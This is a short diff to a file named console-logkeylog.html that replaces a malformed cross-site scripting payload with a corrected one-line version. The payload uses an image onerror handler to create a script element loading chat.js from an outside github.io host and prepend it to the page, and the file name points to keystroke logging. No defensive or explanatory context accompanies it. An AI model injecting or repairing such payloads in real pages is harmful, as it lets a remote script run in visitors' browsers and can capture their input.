--- a/console-logkeylog.html
+++ b/console-logkeylog.html
@@ -1,7 +1,1 @@
-<img src=x onerror="javascript:(() => {const s = document.createElement('script');
-						s.src = 'https://totallylost-helpme.github.io/chat.js';
-						s.async = true;
-						s.onload = () => {console.log('External script loaded successfully')};
-						document.documentElement.prepend(s);
-					};
-				})();">
+<img src="x" onerror="javascript:(() => { const s = document.createElement('script'); s.src = 'https://totallylost-helpme.github.io/chat.js'; s.async = true; s.onload = () => {console.log('External script loaded successfully')}; document.documentElement.prepend(s); })();">
